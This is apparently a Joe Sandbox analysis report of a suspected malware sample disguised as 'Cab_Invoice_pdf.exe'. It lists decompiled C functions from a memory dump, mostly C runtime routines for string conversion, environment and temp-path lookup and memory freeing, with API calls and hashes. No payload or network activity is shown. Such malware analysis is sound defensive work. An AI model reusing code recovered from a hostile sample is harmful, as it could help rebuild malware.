                            0x01320624
                            0x013206de
                            0x013206ec
                            0x013206ee
                            0x013206f3
                            0x013206fa
                            0x013206fc
                            0x0132070a
                            0x01320719
                            0x0132071c
                            0x0132071e
                            0x00000000
                            0x0132071f
                            0x0132062c
                            0x01320631
                            0x01320636
                            0x01320638
                            0x01320638
                            0x0132063a
                            0x0132063f
                            0x01320643
                            0x01320643
                            0x01320646
                            0x01320665
                            0x01320665
                            0x01320667
                            0x0132066a
                            0x01320673
                            0x01320676
                            0x0132067b
                            0x0132067e
                            0x01320683
                            0x00000000
                            0x00000000
                            0x01320685
                            0x00000000
                            0x01320648
                            0x01320648
                            0x0132064a
                            0x01320653
                            0x01320656
                            0x0132065b
                            0x0132065e
                            0x01320663
                            0x0132068d
                            0x01320690
                            0x01320692
                            0x01320695
                            0x0132069d
                            0x013206a3
                            0x013206aa
                            0x013206ac
                            0x013206b4
                            0x013206c3
                            0x013206c7
                            0x013206c9
                            0x013206cc
                            0x00000000
                            0x00000000
                            0x013206ce
                            0x013206d1
                            0x013206d3
                            0x013206d3
                            0x013206d4
                            0x013206d6
                            0x013206d9
                            0x00000000
                            0x013206d3
                            0x00000000
                            0x01320663
                            0x01320646
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: fa05b3bcb4958fcab91e3608216370743745659588d97783abe2b27327ea45b9
                            • Instruction ID: 6ade030b4dd62635b40d77d7f612ad806c8e9e11078fe5e7ac706b52b2b1f7ee
                            • Opcode Fuzzy Hash: fa05b3bcb4958fcab91e3608216370743745659588d97783abe2b27327ea45b9
                            • Instruction Fuzzy Hash: E2410832A002249FDB28EF7CC880A5EB7F5EF89328F254599E555EB385D731E905CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131E132, Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E0131E132(void* __ecx, short* _a4, short* _a8) {
				int _t7;
				char* _t13;
				signed int _t14;
				char* _t15;
				int _t19;
				intOrPtr* _t20;
				short* _t21;
				void* _t22;
				void* _t25;
				int _t29;
				int _t33;
				intOrPtr _t35;
				char* _t36;

				_t25 = __ecx;
				_t7 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t21 = _a8;
				_t33 = _t7;
				_t35 = 0x2a;
				if(_t33 != 0) {
					if(_t21 != 0) {
						_t19 = WideCharToMultiByte(0, 0, _t21, 0xffffffff, 0, 0, 0, 0);
						if(_t19 == 0) {
							goto L1;
						} else {
							_t33 = _t33 + _t19;
						}
					}
				} else {
					L1:
					_t20 = E0131C9CE();
					_t33 = 0;
					 *_t20 = _t35;
				}
				_t36 = E01320B10(_t25, _t33, 1);
				if(_t36 == 0) {
					L8:
					_t22 = 0;
				} else {
					_t29 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t36, _t33, 0, 0);
					if(_t29 != 0) {
						if(_t21 == 0) {
							L12:
							_t13 = _t36;
							_t36 = 0;
							_push(0);
							_push(_t13);
							_t14 = E01326882(0);
							asm("sbb bl, bl");
							_t22 =  ~_t14 + 1;
						} else {
							_t15 = _t29 + _t36;
							 *((char*)(_t15 - 1)) = 0x3d;
							if(WideCharToMultiByte(0, 0, _t21, 0xffffffff, _t15, _t33 - _t29, 0, 0) == 0) {
								goto L7;
							} else {
								goto L12;
							}
						}
					} else {
						L7:
						 *((intOrPtr*)(E0131C9CE())) = 0x2a;
						goto L8;
					}
				}
				E013209EB(_t36);
				return _t22;
			}
















                            0x0131e132
                            0x0131e147
                            0x0131e14d
                            0x0131e150
                            0x0131e154
                            0x0131e157
                            0x0131e166
                            0x0131e173
                            0x0131e17b
                            0x00000000
                            0x0131e17d
                            0x0131e17d
                            0x0131e17d
                            0x0131e17b
                            0x0131e159
                            0x0131e159
                            0x0131e159
                            0x0131e15e
                            0x0131e160
                            0x0131e160
                            0x0131e187
                            0x0131e18d
                            0x0131e1b3
                            0x0131e1b3
                            0x0131e18f
                            0x0131e1a2
                            0x0131e1a6
                            0x0131e1c5
                            0x0131e1e5
                            0x0131e1e5
                            0x0131e1e7
                            0x0131e1e9
                            0x0131e1ea
                            0x0131e1eb
                            0x0131e1f5
                            0x0131e1f8
                            0x0131e1c7
                            0x0131e1c9
                            0x0131e1d0
                            0x0131e1e3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131e1e3
                            0x0131e1a8
                            0x0131e1a8
                            0x0131e1ad
                            0x00000000
                            0x0131e1ad
                            0x0131e1a6
                            0x0131e1b6
                            0x0131e1c2

                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E147
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E173
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E19C
                            • _free.LIBCMT ref: 0131E1B6
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E1DB
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_free
                            • String ID:
                            • API String ID: 4292660327-0
                            • Opcode ID: c67f93c30dbabed9e435354cc9feb4e9bb13382df00983e365696809f3467902
                            • Instruction ID: abd3a894079bf9fc1e1a306f17984d7469b662d96d7c71592780906825045d3b
                            • Opcode Fuzzy Hash: c67f93c30dbabed9e435354cc9feb4e9bb13382df00983e365696809f3467902
                            • Instruction Fuzzy Hash: 8521A8B26493257EFB2A19799C48DBB6A9DDB86B78B140239FD15C71C4DD718C008670
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327C60, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E01327C60() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E01327C29(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E01320A25(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E013209EB(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                            0x01327c6f
                            0x01327c75
                            0x01327ccd
                            0x01327ccd
                            0x01327c77
                            0x01327c78
                            0x01327c7d
                            0x01327c86
                            0x01327c8c
                            0x01327c92
                            0x01327c97
                            0x00000000
                            0x01327c99
                            0x01327c9f
                            0x01327ca4
                            0x01327cc2
                            0x01327cbc
                            0x01327cbc
                            0x01327cbe
                            0x01327cbe
                            0x01327cc5
                            0x01327cca
                            0x01327c97
                            0x01327cd1
                            0x01327cd4
                            0x01327cd4
                            0x01327ce2

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01327C69
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01327C8C
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01327CB2
                            • _free.LIBCMT ref: 01327CC5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01327CD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: be5c9a170883a9fd50af37d43aad9315b5ff28208c11e90a81172bd7fab6ea02
                            • Instruction ID: df37e526d0434a0cd369ce64ff282b53be1677698fa0949e87314868d07fd239
                            • Opcode Fuzzy Hash: be5c9a170883a9fd50af37d43aad9315b5ff28208c11e90a81172bd7fab6ea02
                            • Instruction Fuzzy Hash: DC0184726012397FFB25767A5D88C7F7D6DFED2EA8714012DFA04C3204DA608C0182B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013244A9, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 81%
                            			E013244A9(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x133c238; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E01320B10(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E01323862(_t13, __eflags,  *0x133c238, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E01324297(_t13, _t15, 0x13463f0);
							E013209EB(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E013209EB();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0132380C(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                            0x013244a9
                            0x013244b4
                            0x013244b6
                            0x013244b8
                            0x013244bd
                            0x013244c0
                            0x013244ce
                            0x013244da
                            0x013244dd
                            0x013244e0
                            0x013244f2
                            0x013244f7
                            0x013244f9
                            0x01324504
                            0x0132450a
                            0x01324512
                            0x01324514
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244fb
                            0x013244fb
                            0x00000000
                            0x013244fb
                            0x013244e2
                            0x013244e2
                            0x013244e3
                            0x013244e3
                            0x01324516
                            0x01324517
                            0x01324517
                            0x013244c2
                            0x013244c8
                            0x013244cc
                            0x0132451f
                            0x01324520
                            0x01324526
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013244cc
                            0x0132452d

                            APIs
                            • GetLastError.KERNEL32(?,?,?,0131C9D3,01320B62,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 013244AE
                            • _free.LIBCMT ref: 013244E3
                            • _free.LIBCMT ref: 0132450A
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324517
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324520
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 7e68e8810b6dc87b2f85faf73e279bed7baf442d7019479e3ab7c1280daf2c57
                            • Instruction ID: e2ee204e82f04d08dde2e9175464667eb0a54b2a2cb2e8f7cc3d7b8f2265c890
                            • Opcode Fuzzy Hash: 7e68e8810b6dc87b2f85faf73e279bed7baf442d7019479e3ab7c1280daf2c57
                            • Instruction Fuzzy Hash: BE017833200732A7C227763D5C48E2B26AEDFC1A7CF300126F90AF3541EF60C8058261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327E7E, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01327E7E(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x133c838; // 0x133c830
					if(_t23 != 0) {
						E013209EB(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x133c83c; // 0x1346555
					if(_t24 != 0) {
						E013209EB(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x133c840; // 0x1346555
					if(_t25 != 0) {
						E013209EB(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x133c868; // 0x133c834
					if(_t26 != 0) {
						E013209EB(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x133c86c; // 0x1346558
					if(_t27 != 0) {
						return E013209EB(_t6);
					}
				}
				return _t6;
			}










                            0x01327e84
                            0x01327e89
                            0x01327e8d
                            0x01327e93
                            0x01327e96
                            0x01327e9b
                            0x01327e9f
                            0x01327ea5
                            0x01327ea8
                            0x01327ead
                            0x01327eb1
                            0x01327eb7
                            0x01327eba
                            0x01327ebf
                            0x01327ec3
                            0x01327ec9
                            0x01327ecc
                            0x01327ed1
                            0x01327ed2
                            0x01327ed5
                            0x01327edb
                            0x00000000
                            0x01327ee3
                            0x01327edb
                            0x01327ee6

                            APIs
                            • _free.LIBCMT ref: 01327E96
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327EA8
                            • _free.LIBCMT ref: 01327EBA
                            • _free.LIBCMT ref: 01327ECC
                            • _free.LIBCMT ref: 01327EDE
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d56e15c952441aac06a1d4fb5074be491641f661e5189ca445fee8d3c1c159da
                            • Instruction ID: 9f0fc0fffab5b5df90b5786edacd0b08afae64de6f7a1e93bcd8a6d61d340e75
                            • Opcode Fuzzy Hash: d56e15c952441aac06a1d4fb5074be491641f661e5189ca445fee8d3c1c159da
                            • Instruction Fuzzy Hash: 53F0FF32604224ABE624FB5DE482C1B7BEDBA14B28B641807F14DEB514C730FC8087A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320833, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E01320833(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x133c828; // 0x105f6f8
					if(_t7 != 0x133c608) {
						E013209EB(_t7);
						 *0x133c828 = 0x133c608;
					}
				}
				E013209EB( *0x134630c);
				 *0x134630c = 0;
				E013209EB( *0x1346310);
				 *0x1346310 = 0;
				E013209EB( *0x1345e70);
				 *0x1345e70 = 0;
				E013209EB( *0x1345e74);
				 *0x1345e74 = 0;
				return 1;
			}




                            0x0132083c
                            0x01320840
                            0x01320842
                            0x0132084e
                            0x01320851
                            0x01320857
                            0x01320857
                            0x0132084e
                            0x01320863
                            0x01320870
                            0x01320876
                            0x01320881
                            0x01320887
                            0x01320892
                            0x01320898
                            0x013208a0
                            0x013208a9

                            APIs
                            • _free.LIBCMT ref: 01320851
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01320863
                            • _free.LIBCMT ref: 01320876
                            • _free.LIBCMT ref: 01320887
                            • _free.LIBCMT ref: 01320898
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 261fbeb1b9b07a62a33a4fce966d80fc9120102b58a8956e736adc1b83888e9d
                            • Instruction ID: d7d16b544a83020e4f203888848185fe598873af0cdd4b14f7f71a749fd32dbb
                            • Opcode Fuzzy Hash: 261fbeb1b9b07a62a33a4fce966d80fc9120102b58a8956e736adc1b83888e9d
                            • Instruction Fuzzy Hash: E9F030BA9012318BDA357F69F40284A3FE8E719B34B015A07F41566268CF762D458FC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131F756, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E0131F756(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x1345eb0, 0x104);
					_t48 =  *0x1345e7c; // 0x1051c2a
					 *0x1345e80 = 0x1345eb0;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x1345eb0;
					}
					_v8 = 0;
					_v16 = 0;
					E0131F875(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0131F9FB(_v8, _v16, 2);
					if(_t61 != 0) {
						E0131F875(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E01327493(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x1345e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x1345e74 = _t56;
									L16:
									E013209EB(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x1345e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x1345e74 = _t42;
						goto L10;
					} else {
						_t43 = E0131C9CE();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E013209EB(_t61);
						return _t49;
					}
				} else {
					_t44 = E0131C9CE();
					_t62 = 0x16;
					 *_t44 = _t62;
					E01321788();
					return _t62;
				}
			}

















                            0x0131f763
                            0x0131f791
                            0x0131f797
                            0x0131f79d
                            0x0131f7a5
                            0x0131f7ac
                            0x0131f7ac
                            0x0131f7b1
                            0x0131f7b8
                            0x0131f7bf
                            0x0131f7d1
                            0x0131f7d8
                            0x0131f7f7
                            0x0131f803
                            0x0131f81e
                            0x0131f821
                            0x0131f828
                            0x0131f82e
                            0x0131f835
                            0x0131f838
                            0x0131f83a
                            0x0131f83e
                            0x0131f848
                            0x0131f848
                            0x0131f84a
                            0x0131f850
                            0x0131f853
                            0x0131f855
                            0x0131f85b
                            0x0131f85c
                            0x0131f862
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131f840
                            0x0131f840
                            0x0131f840
                            0x0131f843
                            0x0131f844
                            0x00000000
                            0x0131f840
                            0x0131f830
                            0x00000000
                            0x0131f830
                            0x0131f809
                            0x0131f80e
                            0x0131f810
                            0x0131f812
                            0x00000000
                            0x0131f7da
                            0x0131f7da
                            0x0131f7df
                            0x0131f7e1
                            0x0131f7e2
                            0x0131f817
                            0x0131f817
                            0x0131f865
                            0x0131f866
                            0x00000000
                            0x0131f86f
                            0x0131f76b
                            0x0131f76b
                            0x0131f772
                            0x0131f773
                            0x0131f775
                            0x00000000
                            0x0131f77a

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cab_Invoice_pdf.exe,00000104), ref: 0131F791
                            • _free.LIBCMT ref: 0131F85C
                            • _free.LIBCMT ref: 0131F866
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                            • API String ID: 2506810119-125003824
                            • Opcode ID: 7f77fdf47c1f6fbee2ebc327c88bc4ae18478eb826bcb05116aa8593428ecacc
                            • Instruction ID: 5ec9d2aefa12972e1298bd1f9c83a26dea9c491dbc337891cb509af0698c1db8
                            • Opcode Fuzzy Hash: 7f77fdf47c1f6fbee2ebc327c88bc4ae18478eb826bcb05116aa8593428ecacc
                            • Instruction Fuzzy Hash: B2318075E00229EFDB39DF9DD88099EBFFCEB85714B144166E90897204D6B09E45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131F193, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E0131F193(void* __ecx, char* _a4, char** _a8) {
				char* _v8;
				intOrPtr _v12;
				signed short* _v36;
				void* _t14;
				void* _t15;
				char** _t16;
				char* _t20;
				void* _t27;
				signed int* _t28;
				signed int* _t32;
				void* _t39;
				void* _t52;
				signed int _t57;
				signed short* _t58;
				intOrPtr _t59;
				char* _t61;
				char* _t62;
				signed int _t64;
				signed int* _t66;
				char* _t68;
				signed short* _t70;

				_t39 = __ecx;
				_push(__ecx);
				_v8 = 0;
				_t14 = E01326CA2( &_v8, 0, L"TMP");
				if(_t14 == 0) {
					_t68 = _v8;
					_t61 = _t68;
					if(_t68 == 0) {
						goto L10;
					} else {
						_t20 = E01326D40(_t68, 0);
						if(_t20 != 0) {
							_push(_t61);
							L19();
							_t61 = _t20;
							if(_t61 == 0 || E01326D40(_t61, 0) != 0) {
								E013209EB(_t61);
								goto L10;
							} else {
								 *_a8 = _t61;
								E013209EB(0);
							}
						} else {
							_t68 = 0;
							 *_a8 = _t61;
						}
					}
					goto L17;
				} else {
					if(_t14 == 0x16) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E01321798();
						asm("int3");
						_push(_t39);
						_push(0);
						_push(_t67);
						_t70 = _v36;
						_push(_t60);
						_t52 = 0;
						_t27 = 0;
						_t58 = _t70;
						_t64 =  *_t70 & 0x0000ffff;
						if(_t64 == 0) {
							L34:
							_t28 = 0;
						} else {
							_v12 = 0x22;
							do {
								if(_t64 == _v12) {
									_t52 = _t52 + 1;
								}
								_t58 =  &(_t58[1]);
								_t27 = _t27 + 1;
								_t64 =  *_t58 & 0x0000ffff;
							} while (_t64 != 0);
							if(_t52 == 0) {
								goto L34;
							} else {
								_t66 = E01320B10(_t52, _t27 - _t52 + 1, 2);
								if(_t66 != 0) {
									_t32 = _t66;
									if( *_t70 != 0) {
										_t59 = _v12;
										do {
											_t57 =  *_t70 & 0x0000ffff;
											if(_t57 != _t59) {
												 *_t32 = _t57;
												_t32 =  &(_t32[0]);
											}
											_t70 =  &(_t70[1]);
										} while ( *_t70 != 0);
									}
									 *_t32 = 0;
								} else {
									_t66 = 0;
								}
								E013209EB(0);
								_t28 = _t66;
							}
						}
						return _t28;
					} else {
						_t68 = 0;
						L10:
						_t62 = _a4;
						if(_t62 == 0 || E01326D40(_t62, 0) != 0) {
							_t62 = "\\";
							_t15 = E01326D40(_t62, 0);
							_t16 = _a8;
							if(_t15 == 0) {
								goto L13;
							} else {
								 *_t16 = ".";
							}
						} else {
							_t16 = _a8;
							L13:
							 *_t16 = _t62;
						}
						_t61 = 0;
						L17:
						E013209EB(_t68);
						return _t61;
					}
				}
			}
























                            0x0131f193
                            0x0131f198
                            0x0131f1a8
                            0x0131f1ab
                            0x0131f1b5
                            0x0131f1c4
                            0x0131f1c7
                            0x0131f1cb
                            0x00000000
                            0x0131f1cd
                            0x0131f1cf
                            0x0131f1d8
                            0x0131f1e3
                            0x0131f1e4
                            0x0131f1e9
                            0x0131f1ee
                            0x0131f20c
                            0x00000000
                            0x0131f1fd
                            0x0131f201
                            0x0131f203
                            0x0131f208
                            0x0131f1da
                            0x0131f1dd
                            0x0131f1df
                            0x0131f1df
                            0x0131f1d8
                            0x00000000
                            0x0131f1b7
                            0x0131f1ba
                            0x0131f25a
                            0x0131f25b
                            0x0131f25c
                            0x0131f25d
                            0x0131f25e
                            0x0131f25f
                            0x0131f264
                            0x0131f26a
                            0x0131f26b
                            0x0131f26c
                            0x0131f26d
                            0x0131f272
                            0x0131f273
                            0x0131f275
                            0x0131f277
                            0x0131f279
                            0x0131f27f
                            0x0131f2e6
                            0x0131f2e6
                            0x0131f281
                            0x0131f281
                            0x0131f288
                            0x0131f28c
                            0x0131f28e
                            0x0131f28e
                            0x0131f28f
                            0x0131f292
                            0x0131f293
                            0x0131f296
                            0x0131f29d
                            0x00000000
                            0x0131f29f
                            0x0131f2aa
                            0x0131f2b0
                            0x0131f2b6
                            0x0131f2bb
                            0x0131f2bd
